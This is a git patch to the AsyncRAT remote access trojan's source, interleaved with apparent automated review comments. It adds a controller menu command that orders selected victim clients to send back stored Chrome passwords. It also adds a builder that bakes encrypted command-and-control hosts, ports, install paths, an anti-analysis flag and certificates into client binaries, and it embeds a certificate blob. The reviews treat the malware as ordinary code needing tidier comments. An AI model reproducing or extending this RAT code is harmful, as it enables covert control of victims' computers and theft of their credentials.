From db90ddf043620c916cfc4348f17cae2cf757b225 Mon Sep 17 00:00:00 2001 
From: NYAN CAT Date: Sat, 11 May 2019 08:05:18 -0700 Subject: [PATCH] Update Added secure socket Added chrome password recovery --- AsyncRAT-C#/AsyncRAT-Sharp/App.config | 11 +- .../AsyncRAT-Sharp/AsyncRAT-Sharp.csproj | 16 + .../AsyncRAT-Sharp/Cryptography/Sha256.cs | 33 + .../AsyncRAT-Sharp/Forms/Form1.Designer.cs | 17 +- AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs | 42 +- .../AsyncRAT-Sharp/Forms/FormBuilder.cs | 38 +- .../Forms/FormCertificate.Designer.cs | 66 ++ .../AsyncRAT-Sharp/Forms/FormCertificate.cs | 127 ++++ .../AsyncRAT-Sharp/Forms/FormCertificate.resx | 577 ++++++++++++++++++ .../AsyncRAT-Sharp/Forms/FormDownloadFile.cs | 10 +- .../Forms/FormPorts.Designer.cs | 28 +- AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs | 23 +- .../Handle Packet/HandleFileManager.cs | 1 + .../Handle Packet/HandleRemoteDesktop.cs | 1 + .../AsyncRAT-Sharp/Handle Packet/Packet.cs | 15 +- AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs | 16 +- AsyncRAT-C#/AsyncRAT-Sharp/Program.cs | 12 + .../Properties/Resources.Designer.cs | 10 + .../AsyncRAT-Sharp/Properties/Resources.resx | 7 +- .../Properties/Settings.Designer.cs | 12 - .../Properties/Settings.settings | 3 - .../Resources/AsyncRAT-Sharp.exe.config | 11 +- AsyncRAT-C#/AsyncRAT-Sharp/Resources/key.png | Bin 0 -> 828 bytes AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs | 11 +- AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs | 119 ++-- AsyncRAT-C#/AsyncRAT-Sharp/packages.config | 1 + AsyncRAT-C#/Client/Client.csproj | 5 + AsyncRAT-C#/Client/Cryptography/Sha256.cs | 33 + AsyncRAT-C#/Client/Handle Packet/HandleDos.cs | 13 +- .../Client/Handle Packet/HandleFileManager.cs | 28 +- .../Handle Packet/HandleRemoteDesktop.cs | 21 +- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 9 +- AsyncRAT-C#/Client/Program.cs | 4 + AsyncRAT-C#/Client/Recovery/Recovery.cs | 219 +++++++ AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs | 473 ++++++++++++++ AsyncRAT-C#/Client/Settings.cs | 46 +- AsyncRAT-C#/Client/Sockets/ClientSocket.cs | 99 +-- 37 files changed, 1940 
insertions(+), 217 deletions(-) create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Cryptography/Sha256.cs create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.Designer.cs create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.cs create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.resx create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Resources/key.png create mode 100644 AsyncRAT-C#/Client/Cryptography/Sha256.cs create mode 100644 AsyncRAT-C#/Client/Recovery/Recovery.cs create mode 100644 AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/App.config b/AsyncRAT-C#/AsyncRAT-Sharp/App.config index 61bc085..67f88a7 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/App.config +++ b/AsyncRAT-C#/AsyncRAT-Sharp/App.config @@ -11,22 +11,19 @@ - - - - + - + - + False - + diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj index c5c450b..2b7c3e9 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj +++ b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj @@ -43,6 +43,9 @@ app.manifest + + ..\packages\BouncyCastle.1.8.5\lib\BouncyCastle.Crypto.dll + False Resources\cGeoIp.dll @@ -53,6 +56,8 @@ + + @@ -65,6 +70,7 @@ + Form @@ -77,6 +83,12 @@ FormBuilder.cs + + Form + + + FormCertificate.cs + Form @@ -170,6 +182,9 @@ FormBuilder.cs + + FormCertificate.cs + FormDOS.cs @@ -219,6 +234,7 @@ + diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Cryptography/Sha256.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Cryptography/Sha256.cs new file mode 100644 index 0000000..55e815c --- /dev/null +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Cryptography/Sha256.cs 
@@ -0,0 +1,33 @@
+using System.Security.Cryptography;
+using System.Text;
+
+namespace AsyncRAT_Sharp.Cryptography
+{
+ public static class Sha256
+ {
+ public static string ComputeHash(string input)
+ {
+ byte[] data = Encoding.UTF8.GetBytes(input);
+
+ using (SHA256Managed sha = new SHA256Managed())
+ {
+ data = sha.ComputeHash(data);
+ }
+
+ StringBuilder hash = new StringBuilder();
+
+ foreach (byte _byte in data)
+ hash.Append(_byte.ToString("X2"));
+
+ return hash.ToString().ToUpper();
+ }
+
+ public static byte[] ComputeHash(byte[] input)
+ {
+ using (SHA256Managed sha = new SHA256Managed())
+ {
+ return sha.ComputeHash(input);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
index 23762ae..c771e2d 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
@@ -64,6 +65,7 @@ this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator(); this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.pASSWORDRECOVERYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.statusStrip1 = new System.Windows.Forms.StatusStrip(); this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); this.ping = new System.Windows.Forms.Timer(this.components);
@@ -157,12 +158,12 @@ // lv_prefor // this.lv_prefor.Text = "PERFORMANCE"; - this.lv_prefor.Width = 170; + this.lv_prefor.Width = 189; // // lv_admin // this.lv_admin.Text = "PRIVILEGES"; - this.lv_admin.Width = 138; + this.lv_admin.Width = 166; // // contextMenuStrip1 //
@@ -178,6 +179,7 @@ this.kEYLOGGERToolStripMenuItem, this.toolStripMenuItem1, this.fILEMANAGERToolStripMenuItem, + this.pASSWORDRECOVERYToolStripMenuItem, this.pROCESSMANAGERToolStripMenuItem, this.dISABLESToolStripMenuItem, this.bOTKILLERToolStripMenuItem,
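Review bot: In the new Sha256.cs, `ComputeHash(string)` ends with `hash.ToString().ToUpper()`, but the `"X2"` format already emits upper-case hex, so the call is redundant; `return hash.ToString();` gives the same result. The two overloads share one name yet return different representations (an upper-case hex string for the `string` overload, raw digest bytes for the `byte[]` overload), and neither has a `///` summary telling a caller that compares or signs a digest which one it is getting. The `foreach` body is also the only unbraced statement in the file.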
@@ -188,7 +190,7 @@ this.toolStripSeparator3, this.aBOUTToolStripMenuItem}); this.contextMenuStrip1.Name = "contextMenuStrip1"; - this.contextMenuStrip1.Size = new System.Drawing.Size(283, 502); + this.contextMenuStrip1.Size = new System.Drawing.Size(283, 568); // // cLIENTOPTIONSToolStripMenuItem // @@ -373,6 +375,14 @@ this.aBOUTToolStripMenuItem.Text = "ABOUT"; this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click); // + // pASSWORDRECOVERYToolStripMenuItem + // + this.pASSWORDRECOVERYToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.key; + this.pASSWORDRECOVERYToolStripMenuItem.Name = "pASSWORDRECOVERYToolStripMenuItem"; + this.pASSWORDRECOVERYToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.pASSWORDRECOVERYToolStripMenuItem.Text = "PASSWORD RECOVERY"; + this.pASSWORDRECOVERYToolStripMenuItem.Click += new System.EventHandler(this.PASSWORDRECOVERYToolStripMenuItem_Click); + // // statusStrip1 // this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); @@ -638,6 +648,7 @@ private System.Windows.Forms.ToolStripMenuItem wINDOWDSDEFENDERToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem gETADMINISTRATORPRIVILEGESToolStripMenuItem; private System.Windows.Forms.ColumnHeader lv_admin; + private System.Windows.Forms.ToolStripMenuItem pASSWORDRECOVERYToolStripMenuItem; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs index 3fa3288..726c66f 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs 
@@ -13,14 +13,21 @@ using AsyncRAT_Sharp.Cryptography; using System.Diagnostics; using System.Net.Sockets; using AsyncRAT_Sharp.Handle_Packet; +using AsyncRAT_Sharp.Helper; +using System.Security.Cryptography.X509Certificates; // │ Author : NYAN CAT -// │ Name : AsyncRAT // Simple Socket +// │ Name : AsyncRAT // Simple RAT // Contact Me : https://github.com/NYAN-x-CAT // This program Is distributed for educational purposes only. +// Credits; +// Serialization @ymofen +// StreamLibrary @Dergan +// Special Thanks MaxXor@hf gigajew@hf + namespace AsyncRAT_Sharp { @@ -28,7 +35,6 @@ namespace AsyncRAT_Sharp { public Form1() { - CheckFiles(); InitializeComponent(); this.Opacity = 0; } 
@@ -64,19 +70,17 @@ namespace AsyncRAT_Sharp private async void Form1_Load(object sender, EventArgs e) { - Text = $"{Settings.Version}"; + CheckFiles(); + + this.Text = $"{Settings.Version}"; #if DEBUG + Settings.ServerCertificate = new X509Certificate2(Convert.FromBase64String("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")); Settings.Port = "6606"; - 
Settings.Password = "NYAN CAT"; - Settings.AES = new Aes256(Settings.Password); #else using (FormPorts portsFrm = new FormPorts()) { portsFrm.ShowDialog(); Settings.Port = portsFrm.textPorts.Text; - Settings.Password = portsFrm.textPassword.Text; - Settings.AES = new Aes256(Settings.Password); - new HandleLogs().Addmsg($"Password {Settings.Password}", Color.Green); } #endif @@ -711,5 +715,27 @@ namespace AsyncRAT_Sharp } } } + + private void PASSWORDRECOVERYToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "recoveryPassword"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } } } \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs index 59ee64a..d71dceb 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs @@ -4,6 +4,9 @@ using Mono.Cecil; using AsyncRAT_Sharp.Helper; using Mono.Cecil.Cil; using System.Text; +using System.Security.Cryptography; +using AsyncRAT_Sharp.Cryptography; +using System.Security.Cryptography.X509Certificates; namespace AsyncRAT_Sharp.Forms { 
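Review bot: The `#if DEBUG` branch of Form1_Load builds `Settings.ServerCertificate` from a Base64 literal passed to `new X509Certificate2(byte[])` with no password argument. The literal has the shape of a PKCS#12 container, so it presumably carries the private key as well; if so, that key is committed in the clear and every DEBUG build presents the same certificate. It is therefore a fixed, publicly known identity rather than a secret and should be labelled as such, e.g. `// DEBUG only: fixed test certificate whose private key is public; identical in every debug build`. The same hunk removes `Settings.Password` and the `HandleLogs().Addmsg` line that wrote it to the log. Form1_Load continues outside the hunk.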
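Review bot: PASSWORDRECOVERYToolStripMenuItem_Click has no comment, and its menu label understates what it does: it queues a `recoveryPassword` packet to every client selected in `listView1`. Going by the commit's own file list (`Client/Recovery/Recovery.cs`, `Client/Recovery/SQLiteHandler.cs`, "Added chrome password recovery"), the client side presumably reads stored browser credentials on the remote host and returns them, although that code is not in this hunk. A summary such as `/// Sends the "recoveryPassword" command to each selected client; handled by the client-side Recovery module.` would make the data flow explicit for anyone auditing this code or writing detections for it. The `try`/`catch` covers only packet construction and queuing, because `client.BeginSend` runs later on the thread pool.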
@@ -92,6 +95,17 @@ namespace AsyncRAT_Sharp.Forms private void WriteSettings(AssemblyDefinition asmDef) { + var key = Methods.GetRandomString(32); + var aes = new Aes256(key); + var caCertificate = new X509Certificate2(Settings.CertificatePath, "", X509KeyStorageFlags.Exportable); + var serverCertificate = new X509Certificate2(caCertificate.Export(X509ContentType.Cert)); + byte[] signature; + using (var csp = (RSACryptoServiceProvider)caCertificate.PrivateKey) + { + var hash = Sha256.ComputeHash(Encoding.UTF8.GetBytes(key)); + signature = csp.SignHash(hash, CryptoConfig.MapNameToOID("SHA256")); + } + foreach (var typeDef in asmDef.Modules[0].Types) { if (typeDef.FullName == "Client.Settings") 
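Review bot: `caCertificate` and `serverCertificate` in WriteSettings are the same certificate, the second being the first re-exported with `X509ContentType.Cert` (public part only), and nothing in the hunk says so. The PKCS#12 at `Settings.CertificatePath` is opened with an empty password (`""`), so the signing key is unprotected at rest wherever that file is kept. A comment ahead of the block should record both facts and what is signed, e.g. `// signature = RSA/SHA-256 by the server certificate's key over the UTF-8 bytes of the per-build random key`. WriteSettings continues outside the hunk.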
@@ -106,29 +120,35 @@ namespace AsyncRAT_Sharp.Forms { string operand = methodDef.Body.Instructions[i].Operand.ToString(); - if (operand == "6606") - methodDef.Body.Instructions[i].Operand = Settings.AES.Encrypt(textPort.Text); + if (operand == "%Ports%") + methodDef.Body.Instructions[i].Operand = aes.Encrypt(textPort.Text); - if (operand == "127.0.0.1") - methodDef.Body.Instructions[i].Operand = Settings.AES.Encrypt(textIP.Text); + if (operand == "%Hosts%") + methodDef.Body.Instructions[i].Operand = aes.Encrypt(textIP.Text); - if (operand == "false") + if (operand == "%Install%") methodDef.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower(); - if (operand == "%AppData%") + if (operand == "%Folder%") methodDef.Body.Instructions[i].Operand = comboBoxFolder.Text; - if (operand == "Payload.exe") + if (operand == "%File%") methodDef.Body.Instructions[i].Operand = textFilename.Text; - if (operand == "NYAN CAT") - methodDef.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(Settings.Password)); + if (operand == "%Key%") + methodDef.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(key)); if (operand == "%MTX%") methodDef.Body.Instructions[i].Operand = txtMutex.Text; if (operand == "%Anti%") methodDef.Body.Instructions[i].Operand = chkAnti.Checked.ToString().ToLower(); + + if (operand == "%Certificate%") + methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(serverCertificate.Export(X509ContentType.Cert))); + + if (operand == "%Serversignature%") + methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature)); } } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.Designer.cs new file mode 100644 index 0000000..9c2ba39 --- /dev/null +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.Designer.cs 
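Review bot: The new `%Key%` branch stores the per-build key in the client as plain Base64, inside the same `Client.Settings` type that receives the `aes.Encrypt(...)` values for `%Ports%`, `%Hosts%`, `%Certificate%` and `%Serversignature%`. Assuming `Aes256` (not shown here) derives its key only from that string, those fields are obfuscated rather than secret and can be recovered from any built client. `%Install%`, `%Folder%`, `%File%`, `%MTX%` and `%Anti%` are written with no transformation at all. None of this is documented; a comment above the chain such as `// %Key% is stored as Base64 next to the values it encrypts; encrypted fields are recoverable from a built client` would state it for an analyst reading the builder. The enclosing loop starts before the hunk.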
@@ -0,0 +1,66 @@ +namespace AsyncRAT_Sharp.Forms +{ + partial class FormCertificate + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormCertificate)); + this.richTextBox1 = new System.Windows.Forms.RichTextBox(); + this.SuspendLayout(); + // + // richTextBox1 + // + this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None; + this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Fill; + this.richTextBox1.Font = new System.Drawing.Font("Microsoft Sans Serif", 10F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + this.richTextBox1.Location = new System.Drawing.Point(0, 0); + this.richTextBox1.Name = "richTextBox1"; + this.richTextBox1.ReadOnly = true; + this.richTextBox1.Size = new System.Drawing.Size(565, 146); + this.richTextBox1.TabIndex = 0; + this.richTextBox1.Text = " \n Certificate is not found.\n Creating a new certificate... 
Please wait..."; + // + // FormCertificate + // + this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(565, 146); + this.Controls.Add(this.richTextBox1); + this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); + this.Name = "FormCertificate"; + this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent; + this.Text = "Certificate"; + this.Load += new System.EventHandler(this.FormCertificate_Load); + this.ResumeLayout(false); + + } + + #endregion + + private System.Windows.Forms.RichTextBox richTextBox1; + } +} \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.cs new file mode 100644 index 0000000..dd4c167 --- /dev/null +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.cs 
@@ -0,0 +1,127 @@
+using System;
+using System.Threading.Tasks;
+using System.Windows.Forms;
+using Org.BouncyCastle.Asn1.X509;
+using Org.BouncyCastle.Crypto;
+using Org.BouncyCastle.Crypto.Generators;
+using Org.BouncyCastle.Crypto.Operators;
+using Org.BouncyCastle.Crypto.Parameters;
+using Org.BouncyCastle.Crypto.Prng;
+using Org.BouncyCastle.Math;
+using Org.BouncyCastle.Security;
